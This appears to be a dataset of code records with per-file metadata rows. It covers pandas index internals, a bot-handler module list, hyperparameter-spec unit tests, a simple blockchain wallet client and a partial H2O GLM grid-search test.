Return boolean if values in the object are
monotonic_increasing.
Returns
-------
bool
"""
from pandas import Index
return Index(self).is_monotonic
@property
def is_monotonic_increasing(self) -> bool:
"""
Alias for is_monotonic.
"""
# mypy complains if we alias directly
return self.is_monotonic
@property
def is_monotonic_decreasing(self) -> bool:
"""
Return boolean if values in the object are
monotonic_decreasing.
Returns
-------
bool
"""
from pandas import Index
return Index(self).is_monotonic_decreasing
def _memory_usage(self, deep: bool = False) -> int:
"""
Memory usage of the values.
Parameters
----------
deep : bool, default False
Introspect the data deeply, interrogate
`object` dtypes for system-level memory consumption.
Returns
-------
bytes used
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of the
array.
Notes
-----
Memory usage does not include memory consumed by elements that
are not components of the array if deep=False or if used on PyPy
"""
if hasattr(self.array, "memory_usage"):
# https://github.com/python/mypy/issues/1424
# error: "ExtensionArray" has no attribute "memory_usage"
return self.array.memory_usage(deep=deep) # type: ignore[attr-defined]
v = self.array.nbytes
if deep and is_object_dtype(self) and not PYPY:
values = cast(np.ndarray, self._values)
v += lib.memory_usage_of_objects(values)
return v
@doc(
algorithms.factorize,
values="",
order="",
size_hint="",
sort=textwrap.dedent(
"""\
sort : bool, default False
Sort `uniques` and shuffle `codes` to maintain the
relationship.
"""
),
)
def factorize(self, sort: bool = False, na_sentinel: int | None = -1):
return algorithms.factorize(self, sort=sort, na_sentinel=na_sentinel)
_shared_docs[
"searchsorted"
] = """
Find indices where elements should be inserted to maintain order.
Find the indices into a sorted {klass} `self` such that, if the
corresponding elements in `value` were inserted before the indices,
the order of `self` would be preserved.
.. note::
The {klass} *must* be monotonically sorted, otherwise
wrong locations will likely be returned. Pandas does *not*
check this for you.
Parameters
----------
value : array-like or scalar
Values to insert into `self`.
side : {{'left', 'right'}}, optional
If 'left', the index of the first suitable location found is given.
If 'right', return the last such index. If there is no suitable
index, return either 0 or N (where N is the length of `self`).
sorter : 1-D array-like, optional
Optional array of integer indices that sort `self` into ascending
order. They are typically the result of ``np.argsort``.
Returns
-------
int or array of int
A scalar or array of insertion points with the
same shape as `value`.
See Also
--------
sort_values : Sort by the values along either axis.
numpy.searchsorted : Similar method from NumPy.
Notes
-----
Binary search is used to find the required insertion points.
Examples
--------
>>> ser = pd.Series([1, 2, 3])
>>> ser
0 1
1 2
2 3
dtype: int64
>>> ser.searchsorted(4)
3
>>> ser.searchsorted([0, 4])
array([0, 3])
>>> ser.searchsorted([1, 3], side='left')
array([0, 2])
>>> ser.searchsorted([1, 3], side='right')
array([1, 3])
>>> ser = pd.Series(pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000']))
>>> ser
0 2000-03-11
1 2000-03-12
2 2000-03-13
dtype: datetime64[ns]
>>> ser.searchsorted('3/14/2000')
3
>>> ser = pd.Categorical(
... ['apple', 'bread', 'bread', 'cheese', 'milk'], ordered=True
... )
>>> ser
['apple', 'bread', 'bread', 'cheese', 'milk']
Categories (4, object): ['apple' < 'bread' < 'cheese' < 'milk']
>>> ser.searchsorted('bread')
1
>>> ser.searchsorted(['bread'], side='right')
array([3])
If the values are not monotonically sorted, wrong locations
may be returned:
>>> ser = pd.Series([2, 1, 3])
>>> ser
0 2
1 1
2 3
dtype: int64
>>> ser.searchsorted(1) # doctest: +SKIP
0 # wrong result, correct would be 1
"""
@doc(_shared_docs["searchsorted"], klass="Index")
def searchsorted(
self,
value: NumpyValueArrayLike,
side: Literal["left", "right"] = "left",
sorter: NumpySorter = None,
) -> npt.NDArray[np.intp] | np.intp:
return algorithms.searchsorted(self._values, value, side=side, sorter=sorter)
def drop_duplicates(self, keep="first"):
duplicated = self._duplicated(keep=keep)
# error: Value of type "IndexOpsMixin" is not indexable
return self[~duplicated] # type: ignore[index]
@final
def _duplicated(
self, keep: Literal["first", "last", False] = "first"
) -> npt.NDArray[np.bool_]:
return duplicated(self._values, keep=keep)
def _arith_method(self, other, op):
res_name = ops.get_op_result_name(self, other)
lvalues = self._values
rvalues = extract_array(other, extract_numpy=True, extract_range=True)
rvalues = ops.maybe_prepare_scalar_for_op(rvalues, lvalues.shape)
rvalues = ensure_wrapped_if_datetimelike(rvalues)
with np.errstate(all="ignore"):
result = ops.arithmetic_op(lvalues, rvalues, op)
return self._construct_result(result, name=res_name)
def _construct_result(self, result, name):
"""
Construct an appropriately-wrapped result from the ArrayLike result
of an arithmetic-like operation.
"""
raise AbstractMethodError(self)
| 30.338836 | 88 | 0.560208 | [
"BSD-3-Clause"
] | BryanRacic/pandas | pandas/core/base.py | 38,591 | Python |
__all__ = ["main_handler",
"welcome",
"bad_words",
"admin_command",
"joke",
"send_nudes",
"custom_handler",
"delete_buttons",
"super_ban_handler"
]
from core.modules.handler import * | 23.5 | 34 | 0.478723 | [
"Apache-2.0"
] | codacy-badger/nebula-2 | core/modules/handler/__init__.py | 282 | Python |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'maxim'
import six
import unittest
from hyperengine.spec import *
class SpecTest(unittest.TestCase):
def test_zero_nodes(self):
def check_zero_nodes(spec):
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 0)
self.assertEqual(spec, parsed.instantiate([]))
check_zero_nodes(1)
check_zero_nodes([])
check_zero_nodes([1, 2, 3])
check_zero_nodes((1, 2, 3))
check_zero_nodes({})
check_zero_nodes({'a': 0, 'b': 1})
check_zero_nodes({'a': [1, 2], 'b': {'key': (1, 2)}})
def test_uniform(self):
spec = uniform()
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(0.0, parsed.instantiate([0.0]))
self.assertEqual(0.5, parsed.instantiate([0.5]))
self.assertEqual(1.0, parsed.instantiate([1.0]))
def test_uniform_rev(self):
spec = uniform(4, 0)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(0.0, parsed.instantiate([0.0]))
self.assertEqual(2.0, parsed.instantiate([0.5]))
self.assertEqual(4.0, parsed.instantiate([1.0]))
def test_uniform_negative(self):
spec = uniform(-4, -2)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(-4.0, parsed.instantiate([0.0]))
self.assertEqual(-3.0, parsed.instantiate([0.5]))
self.assertEqual(-2.0, parsed.instantiate([1.0]))
def test_uniform_negative_rev(self):
spec = uniform(-2, -4)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(-4.0, parsed.instantiate([0.0]))
self.assertEqual(-3.0, parsed.instantiate([0.5]))
self.assertEqual(-2.0, parsed.instantiate([1.0]))
def test_normal(self):
spec = normal()
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertAlmostEqual(-1.0, parsed.instantiate([0.1587]), delta=0.001)
self.assertAlmostEqual(-0.5, parsed.instantiate([0.3085]), delta=0.001)
self.assertAlmostEqual( 0.0, parsed.instantiate([0.5000]), delta=0.001)
self.assertAlmostEqual( 0.7, parsed.instantiate([0.7580]), delta=0.001)
self.assertAlmostEqual( 0.9, parsed.instantiate([0.8159]), delta=0.001)
def test_choice(self):
spec = choice([10, 20, 30])
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(10, parsed.instantiate([0.0]))
self.assertEqual(20, parsed.instantiate([0.5]))
self.assertEqual(30, parsed.instantiate([1.0]))
def test_choice_str(self):
spec = choice(['foo', 'bar'])
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual('foo', parsed.instantiate([0.0]))
self.assertEqual('bar', parsed.instantiate([1.0]))
def test_merge(self):
spec = merge([uniform(), uniform()], lambda x, y: x+y)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual(0.5, parsed.instantiate([0.0, 0.5]))
self.assertEqual(1.5, parsed.instantiate([0.5, 1.0]))
self.assertEqual(2.0, parsed.instantiate([1.0, 1.0]))
def test_transform(self):
spec = wrap(uniform(), lambda x: x*x)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(0.0, parsed.instantiate([0.0]))
self.assertEqual(4.0, parsed.instantiate([2.0]))
def test_transform_merge(self):
spec = wrap(merge([uniform(), uniform()], lambda x, y: x+y), lambda x: x*x)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual(1.0, parsed.instantiate([0.0, 1.0]))
self.assertEqual(4.0, parsed.instantiate([1.0, 1.0]))
def test_duplicate_nodes_1(self):
node = uniform()
spec = merge([node, node, node], lambda x, y, z: x+y+z)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(3.0, parsed.instantiate([1.0]))
self.assertEqual(9.0, parsed.instantiate([3.0]))
def test_duplicate_nodes_2(self):
node = uniform()
spec = [[node, node]]
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual([[1.0, 1.0]], parsed.instantiate([1.0]))
def test_duplicate_nodes_3(self):
spec = [uniform()] * 3
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual([0.0, 0.0, 0.0], parsed.instantiate([0.0]))
self.assertEqual([1.0, 1.0, 1.0], parsed.instantiate([1.0]))
def test_merge_choice(self):
spec = choice([uniform(0, 1), uniform(2, 3)])
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual(0.0, parsed.instantiate([0.0, 0.0, 0.0]))
self.assertEqual(1.0, parsed.instantiate([1.0, 0.0, 0.0]))
self.assertEqual(2.0, parsed.instantiate([0.0, 0.0, 0.9]))
self.assertEqual(3.0, parsed.instantiate([0.0, 1.0, 0.9]))
def test_if_condition(self):
def if_cond(switch, size, num):
if switch > 0.5:
return [size, num, num]
return [size, num]
spec = merge([uniform(0, 1), uniform(1, 2), uniform(2, 3)], if_cond)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual([1, 2], parsed.instantiate([0, 0, 0]))
self.assertEqual([2, 3], parsed.instantiate([0, 1, 1]))
self.assertEqual([1, 2, 2], parsed.instantiate([1, 0, 0]))
self.assertEqual([2, 3, 3], parsed.instantiate([1, 1, 1]))
def test_object(self):
class Dummy: pass
dummy = Dummy
dummy.value = uniform()
dummy.foo = 'bar'
dummy.ref = dummy
spec = dummy
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
instance = parsed.instantiate([0])
self.assertEqual(0, instance.value)
self.assertEqual('bar', instance.foo)
self.assertEqual(instance, instance.ref)
def test_dict(self):
spec = {1: uniform(), 2: choice(['foo', 'bar']), 3: merge(lambda x: -x, uniform())}
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual({1: 0.0, 2: 'foo', 3: 0.0}, parsed.instantiate([0, 0, 0]))
self.assertEqual({1: 1.0, 2: 'bar', 3: -1.0}, parsed.instantiate([1, 1, 1]))
def test_dict_deep_1(self):
spec = {1: {'foo': uniform() } }
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
def test_dict_deep_2(self):
spec = {'a': {'b': {'c': { 'd': uniform() } } } }
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
def test_math_operations_1(self):
spec = uniform() + 1
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(2.0, parsed.instantiate([1.0]))
def test_math_operations_2(self):
spec = uniform() * (uniform() ** 2 + 1) / uniform()
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual(2.0, parsed.instantiate([1.0, 1.0, 1.0]))
self.assertEqual(1.0, parsed.instantiate([0.5, 1.0, 1.0]))
self.assertEqual(1.0, parsed.instantiate([0.5, 0.0, 0.5]))
def test_math_operations_3(self):
spec = 2 / (1 + uniform()) * (3 - uniform() + 4 ** uniform())
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 3)
self.assertEqual(6.0, parsed.instantiate([1.0, 1.0, 1.0]))
def test_math_operations_4(self):
spec = choice(['foo', 'bar']) + '-' + choice(['abc', 'def'])
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual('foo-abc', parsed.instantiate([0.0, 0.0]))
self.assertEqual('bar-def', parsed.instantiate([1.0, 1.0]))
def test_min_1(self):
spec = min(uniform(), uniform(), 0.5)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual(0.5, parsed.instantiate([1.0, 0.7]))
self.assertEqual(0.5, parsed.instantiate([1.0, 0.5]))
self.assertEqual(0.0, parsed.instantiate([0.0, 0.5]))
def test_min_2(self):
spec = min(uniform(), 0.8, 0.5)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(0.5, parsed.instantiate([1.0]))
self.assertEqual(0.5, parsed.instantiate([0.5]))
self.assertEqual(0.2, parsed.instantiate([0.2]))
def test_min_3(self):
spec = min(uniform(), uniform())
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 2)
self.assertEqual(0.5, parsed.instantiate([1.0, 0.5]))
self.assertEqual(0.2, parsed.instantiate([0.2, 0.5]))
def test_max_1(self):
spec = max(0.5)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 0)
self.assertEqual(0.5, parsed.instantiate([]))
def test_max_2(self):
spec = max(0.5, 1.0)
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 0)
self.assertEqual(1.0, parsed.instantiate([]))
def test_max_3(self):
spec = max(uniform())
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 1)
self.assertEqual(1.0, parsed.instantiate([1.0]))
self.assertEqual(0.0, parsed.instantiate([0.0]))
def test_name_1(self):
aaa = uniform()
bbb = choice(['foo'])
ccc = uniform(-1, 1)
ddd = uniform()
spec = {'aaa': aaa, 'bbb': bbb, 'ccc': ccc **2, 'ddd': [ddd, ddd]}
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 4)
self.assertTrue('aaa' in aaa.name())
self.assertTrue('uniform' in aaa.name())
self.assertTrue('bbb' in bbb.name())
self.assertTrue('choice' in bbb.name())
self.assertTrue('ccc' in ccc.name())
self.assertTrue('uniform' in ccc.name())
self.assertTrue('ddd' in ddd.name())
self.assertTrue('uniform' in ddd.name())
def test_name_2(self):
norm_node = normal()
choice_node = choice([uniform(), uniform(), uniform()])
spec = {'a': {'b': {'c': { 'd': norm_node, 0: choice_node } } } }
# stats.norm.ppf is an instance method in python 2
expected_normal_name = 'norm_gen' if six.PY2 else 'ppf'
parsed = ParsedSpec(spec)
self.assertEqual(parsed.size(), 5)
self.assertTrue('a-b-c-d' in norm_node.name(), 'name=%s' % norm_node.name())
self.assertTrue(expected_normal_name in norm_node.name(), 'name=%s' % norm_node.name())
self.assertTrue('a-b-c-0' in choice_node.name(), 'name=%s' % choice_node.name())
self.assertTrue('choice' in choice_node.name(), 'name=%s' % choice_node.name())
| 32.170347 | 91 | 0.63836 | [
"Apache-2.0"
] | KOLANICH/hyper-engine | hyperengine/tests/spec_test.py | 10,198 | Python |
import binascii
import requests
from Crypto.PublicKey import RSA
from common.transaction import Transaction
from common.transaction_input import TransactionInput
from common.transaction_output import TransactionOutput
from common.utils import calculate_hash
class Owner:
def __init__(self, private_key: str = ""):
if private_key:
self.private_key = RSA.importKey(private_key)
else:
self.private_key = RSA.generate(2048)
public_key = self.private_key.publickey().export_key("DER")
self.public_key_hex = binascii.hexlify(public_key).decode("utf-8")
self.public_key_hash = calculate_hash(calculate_hash(self.public_key_hex, hash_function="sha256"),
hash_function="ripemd160")
class Node:
def __init__(self):
ip = "127.0.0.1"
port = 5000
self.base_url = f"http://{ip}:{port}/"
def send(self, transaction_data: dict) -> requests.Response:
url = f"{self.base_url}transactions"
req_return = requests.post(url, json=transaction_data)
req_return.raise_for_status()
return req_return
class Wallet:
def __init__(self, owner: Owner):
self.owner = owner
self.node = Node()
def process_transaction(self, inputs: [TransactionInput], outputs: [TransactionOutput]) -> requests.Response:
transaction = Transaction(inputs, outputs)
transaction.sign(self.owner)
return self.node.send({"transaction": transaction.transaction_data})
| 33.630435 | 113 | 0.678087 | [
"Apache-2.0"
] | MikitaSaladukha/my-blockchain | src/wallet/wallet.py | 1,547 | Python |
from __future__ import print_function
import sys
import random
import os
from builtins import range
import time
import json
sys.path.insert(1, "../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
from h2o.grid.grid_search import H2OGridSearch
class Test_glm_random_grid_search:
"""
This class is created to test the three stopping conditions for randomized gridsearch using
GLM Binomial family. The three stopping conditions are :
1. max_runtime_secs:
2. max_models:
3. metrics. We will be picking 2 stopping metrics to test this stopping condition with. One metric
will be optimized if it increases and the other one should be optimized if it decreases.
I have written 4 tests:
1. test1_glm_random_grid_search_model_number: this test will not put any stopping conditions
on randomized search. The purpose here is to make sure that randomized search will give us all possible
hyper-parameter combinations.
2. test2_glm_random_grid_search_max_model: this test the stopping condition of setting the max_model in
search criteria;
3. test3_glm_random_grid_search_max_runtime_secs: this test the stopping condition max_runtime_secs
in search criteria;
4. test4_glm_random_grid_search_metric: this test the stopping condition of using a metric which can be
increasing or decreasing.
"""
# parameters set by users, change with care
curr_time = str(round(time.time()))
# parameters denoting filenames of interested that store training/validation/test data sets in csv format
training1_filename = "smalldata/gridsearch/gaussian_training1_set.csv"
json_filename = "random_gridsearch_GLM_Gaussian_hyper_parameter_" + curr_time + ".json"
allowed_diff = 0.5 # error tolerance allowed
allowed_time_diff = 1e-1 # fraction of max_runtime_secs allowed for max run time stopping criteria
# System parameters, do not change. Dire consequences may follow if you do
current_dir = os.path.dirname(os.path.realpath(sys.argv[1])) # directory of this test file
train_row_count = 0 # training data row count, randomly generated later
train_col_count = 0 # training data column count, randomly generated later
max_int_val = 1000 # maximum size of random integer values
min_int_val = 0 # minimum size of random integer values
max_int_number = 3 # maximum number of integer random grid values to generate
max_real_val = 1 # maximum size of random float values
min_real_val = 0.0 # minimum size of random float values
max_real_number = 3 # maximum number of real grid values to generate
lambda_scale = 100 # scale lambda value to be from 0 to 100 instead of 0 to 1
max_runtime_scale = 3 # scale the max runtime to be different from 0 to 1
one_model_time = 0 # time taken to build one barebone model
possible_number_models = 0 # possible number of models built based on hyper-parameter specification
max_model_number = 0 # maximum number of models specified to test for stopping conditions, generated later
max_grid_runtime = 1 # maximum runtime value in seconds, 1 minute max
allowed_scaled_overtime = 1 # used to set max_allowed_runtime as allowed_scaled_overtime * total model run time
allowed_scaled_time = 1 # how much to scale back max time
allowed_scaled_model_number = 1.5 # used to set max_model_number as
# possible_number_models * allowed_scaled_model_number
max_stopping_rounds = 5 # maximum stopping rounds allowed to be used for early stopping metric
max_tolerance = 0.01 # maximum tolerance to be used for early stopping metric
family = 'gaussian' # set gaussian as default
test_name = "pyunit_glm_gaussian_gridsearch_randomdiscrete_large.py" # name of this test
sandbox_dir = "" # sandbox directory where we are going to save our failed test data sets
# store information about training/test data sets
x_indices = [] # store predictor indices in the data set
y_index = 0 # store response index in the data set
training1_data = [] # store training data sets
total_test_number = 5 # number of tests carried out
test_failed = 0 # count total number of tests that have failed
test_failed_array = [0]*total_test_number # denote test results for all tests run. 1 error, 0 pass
test_num = 0 # index representing which test is being run
# give the user opportunity to pre-assign hyper parameters for fixed values
hyper_params = {}
# parameters to be excluded from hyper parameter list even though they may be gridable
exclude_parameter_lists = ['tweedie_link_power', 'tweedie_variance_power'] # do not need these
# these are supposed to be gridable but not really
exclude_parameter_lists.extend(['fold_column', 'weights_column', 'offset_column'])
# these are excluded for extracting parameters to manually build H2O GLM models
exclude_parameter_lists.extend(['model_id'])
gridable_parameters = [] # store griddable parameter names
gridable_types = [] # store the corresponding griddable parameter types
gridable_defaults = [] # store the gridabble parameter default values
correct_model_number = 0 # count number of models built with correct hyper-parameter specification
nfolds = 5 # enable cross validation to test fold_assignment
def __init__(self, family):
"""
Constructor.
:param family: distribution family for tests
:return: None
"""
self.setup_data() # setup_data training data
self.setup_grid_params() # setup_data grid hyper-parameters
def setup_data(self):
"""
This function performs all initializations necessary:
load the data sets and set the training set indices and response column index
"""
# clean out the sandbox directory first
self.sandbox_dir = pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, True)
# preload data sets
self.training1_data = h2o.import_file(path=pyunit_utils.locate(self.training1_filename))
# set data set indices for predictors and response
self.y_index = self.training1_data.ncol-1
self.x_indices = list(range(self.y_index))
# save the training data files just in case the code crashed.
pyunit_utils.remove_csv_files(self.current_dir, ".csv", action='copy', new_dir_path=self.sandbox_dir)
def setup_grid_params(self):
"""
This function setup the randomized gridsearch parameters that will be used later on:
1. It will first try to grab all the parameters that are griddable and parameters used by GLM.
2. It will find the intersection of parameters that are both griddable and used by GLM.
3. There are several extra parameters that are used by GLM that are denoted as griddable but actually is not.
These parameters have to be discovered manually and they These are captured in self.exclude_parameter_lists.
4. We generate the gridsearch hyper-parameter. For numerical parameters, we will generate those randomly.
For enums, we will include all of them.
:return: None
"""
# build bare bone model to get all parameters
model = H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds)
model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
self.one_model_time = pyunit_utils.find_grid_runtime([model]) # find model train time
print("Time taken to build a base barebone model is {0}".format(self.one_model_time))
# grab all gridable parameters and its type
(self.gridable_parameters, self.gridable_types, self.gridable_defaults) = \
pyunit_utils.get_gridables(model._model_json["parameters"])
# give the user opportunity to pre-assign hyper parameters for fixed values
self.hyper_params = {}
self.hyper_params["fold_assignment"] = ['AUTO', 'Random', 'Modulo']
self.hyper_params["missing_values_handling"] = ['MeanImputation', 'Skip']
# randomly generate griddable parameters
(self.hyper_params, self.gridable_parameters, self.gridable_types, self.gridable_defaults) = \
pyunit_utils.gen_grid_search(model.full_parameters.keys(), self.hyper_params, self.exclude_parameter_lists,
self.gridable_parameters, self.gridable_types, self.gridable_defaults,
random.randint(1, self.max_int_number), self.max_int_val, self.min_int_val,
random.randint(1, self.max_real_number), self.max_real_val, self.min_real_val)
# change the value of lambda parameters to be from 0 to self.lambda_scale instead of 0 to 1.
if "lambda" in list(self.hyper_params):
self.hyper_params["lambda"] = [self.lambda_scale * x for x in self.hyper_params["lambda"]]
time_scale = self.max_runtime_scale * self.one_model_time
# change the value of runtime parameters to be from 0 to self.lambda_scale instead of 0 to 1.
if "max_runtime_secs" in list(self.hyper_params):
self.hyper_params["max_runtime_secs"] = [time_scale * x for x in
self.hyper_params["max_runtime_secs"]]
# number of possible models being built:
self.possible_number_models = pyunit_utils.count_models(self.hyper_params)
# save hyper-parameters in sandbox and current test directories.
pyunit_utils.write_hyper_parameters_json(self.current_dir, self.sandbox_dir, self.json_filename,
self.hyper_params)
def tear_down(self):
"""
This function performs teardown after the dynamic test is completed. If all tests
passed, it will delete all data sets generated since they can be quite large. It
will move the training/validation/test data sets into a Rsandbox directory so that
we can re-run the failed test.
"""
if self.test_failed: # some tests have failed. Need to save data sets for later re-runs
# create Rsandbox directory to keep data sets and weight information
self.sandbox_dir = pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, True)
# Do not want to save all data sets. Only save data sets that are needed for failed tests
pyunit_utils.move_files(self.sandbox_dir, self.training1_data_file, self.training1_filename)
# write out the jenkins job info into log files.
json_file = os.path.join(self.sandbox_dir, self.json_filename)
with open(json_file,'wb') as test_file:
json.dump(self.hyper_params, test_file)
else: # all tests have passed. Delete sandbox if if was not wiped before
pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, False)
def test1_glm_random_grid_search_model_number(self, metric_name):
"""
This test is used to make sure the randomized gridsearch will generate all models specified in the
hyperparameters if no stopping condition is given in the search criterion.
:param metric_name: string to denote what grid search model should be sort by
:return: None
"""
print("*******************************************************************************************")
print("test1_glm_random_grid_search_model_number for GLM " + self.family)
h2o.cluster_info()
# setup_data our stopping condition here, random discrete and find all models
search_criteria = {'strategy': 'RandomDiscrete', "stopping_rounds": 0, "seed": round(time.time())}
print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
# fire off random grid-search
random_grid_model = \
H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
hyper_params=self.hyper_params, search_criteria=search_criteria)
random_grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
# compare number of models built from both gridsearch
if not (len(random_grid_model) == self.possible_number_models):
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test1_glm_random_grid_search_model_number for GLM: failed, number of models generated"
"possible model number {0} and randomized gridsearch model number {1} are not "
"equal.".format(self.possible_number_models, len(random_grid_model)))
else:
self.max_grid_runtime = pyunit_utils.find_grid_runtime(random_grid_model) # time taken to build all models
if self.test_failed_array[self.test_num] == 0:
print("test1_glm_random_grid_search_model_number for GLM: passed!")
self.test_num += 1
sys.stdout.flush()
def test2_glm_random_grid_search_max_model(self):
"""
This test is used to test the stopping condition max_model_number in the randomized gridsearch. The
max_models parameter is randomly generated. If it is higher than the actual possible number of models
that can be generated with the current hyper-space parameters, randomized grid search should generate
all the models. Otherwise, grid search shall return a model that equals to the max_model setting.
"""
print("*******************************************************************************************")
print("test2_glm_random_grid_search_max_model for GLM " + self.family)
h2o.cluster_info()
# setup_data our stopping condition here
self.max_model_number = random.randint(1, int(self.allowed_scaled_model_number * self.possible_number_models))
search_criteria = {'strategy': 'RandomDiscrete', 'max_models': self.max_model_number,
"seed": round(time.time())}
print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
print("Possible number of models built is {0}".format(self.possible_number_models))
# fire off random grid-search
grid_model = \
H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
hyper_params=self.hyper_params, search_criteria=search_criteria)
grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
number_model_built = len(grid_model) # count actual number of models built
print("Maximum model limit is {0}. Number of models built is {1}".format(search_criteria["max_models"],
number_model_built))
if self.possible_number_models >= self.max_model_number: # stopping condition restricts model number
if not (number_model_built == self.max_model_number):
print("test2_glm_random_grid_search_max_model: failed. Number of model built {0} "
"does not match stopping condition number{1}.".format(number_model_built, self.max_model_number))
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
else:
print("test2_glm_random_grid_search_max_model for GLM: passed.")
else: # stopping condition is too loose
if not (number_model_built == self.possible_number_models):
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test2_glm_random_grid_search_max_model: failed. Number of model built {0} does not equal "
"to possible model number {1}.".format(number_model_built, self.possible_number_models))
else:
print("test2_glm_random_grid_search_max_model for GLM: passed.")
self.test_num += 1
sys.stdout.flush()
def test3_glm_random_grid_search_max_runtime_secs(self):
"""
This function will test the stopping criteria max_runtime_secs. For each model built, the field
run_time actually denote the time in ms used to build the model. We will add up the run_time from all
models and check against the stopping criteria max_runtime_secs. Since each model will check its run time
differently, there is some inaccuracies in the actual run time. For example, if we give a model 10 ms to
build. The GLM may check and see if it has used up all the time for every 10 epochs that it has run. On
the other hand, deeplearning may check the time it has spent after every epoch of training.
If we are able to restrict the runtime to not exceed the specified max_runtime_secs by a certain
percentage, we will consider the test a success.
:return: None
"""
print("*******************************************************************************************")
print("test3_glm_random_grid_search_max_runtime_secs for GLM " + self.family)
h2o.cluster_info()
if "max_runtime_secs" in list(self.hyper_params):
del self.hyper_params['max_runtime_secs']
# number of possible models being built:
self.possible_number_models = pyunit_utils.count_models(self.hyper_params)
# setup_data our stopping condition here
max_run_time_secs = random.uniform(self.one_model_time, self.allowed_scaled_time*self.max_grid_runtime)
search_criteria = {'strategy': 'RandomDiscrete', 'max_runtime_secs': max_run_time_secs,
"seed": round(time.time())}
# search_criteria = {'strategy': 'RandomDiscrete', 'max_runtime_secs': 1/1e8}
print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
# fire off random grid-search
grid_model = \
H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
hyper_params=self.hyper_params, search_criteria=search_criteria)
grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
actual_run_time_secs = pyunit_utils.find_grid_runtime(grid_model)
print("Maximum time limit is {0}. Time taken to build all model is "
"{1}".format(search_criteria["max_runtime_secs"], actual_run_time_secs))
print("Maximum model number is {0}. Actual number of models built is {1}".format(self.possible_number_models,
len(grid_model)))
if actual_run_time_secs <= search_criteria["max_runtime_secs"]*(1+self.allowed_diff):
print("test3_glm_random_grid_search_max_runtime_secs: passed!")
if len(grid_model) > self.possible_number_models: # generate too many models, something is wrong
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test3_glm_random_grid_search_max_runtime_secs: failed. Generated {0} models "
" which exceeds maximum possible model number {1}".format(len(grid_model),
self.possible_number_models))
elif len(grid_model) == 1: # will always generate 1 model
print("test3_glm_random_grid_search_max_runtime_secs: passed!")
else:
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test3_glm_random_grid_search_max_runtime_secs: failed. Model takes time {0}"
" seconds which exceeds allowed time {1}".format(actual_run_time_secs,
max_run_time_secs*(1+self.allowed_diff)))
self.test_num += 1
sys.stdout.flush()
def test4_glm_random_grid_search_metric(self, metric_name, bigger_is_better):
"""
This function will test the last stopping condition using metrics.
:param metric_name: metric we want to use to test the last stopping condition
:param bigger_is_better: higher metric value indicates better model performance
:return: None
"""
print("*******************************************************************************************")
print("test4_glm_random_grid_search_metric using " + metric_name + " for family " + self.family)
h2o.cluster_info()
search_criteria = {
"strategy": "RandomDiscrete",
"stopping_metric": metric_name,
"stopping_tolerance": random.uniform(1e-8, self.max_tolerance),
"stopping_rounds": random.randint(1, self.max_stopping_rounds),
"seed": round(time.time())
}
print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
# add max_runtime_secs back into hyper-parameters to limit model runtime.
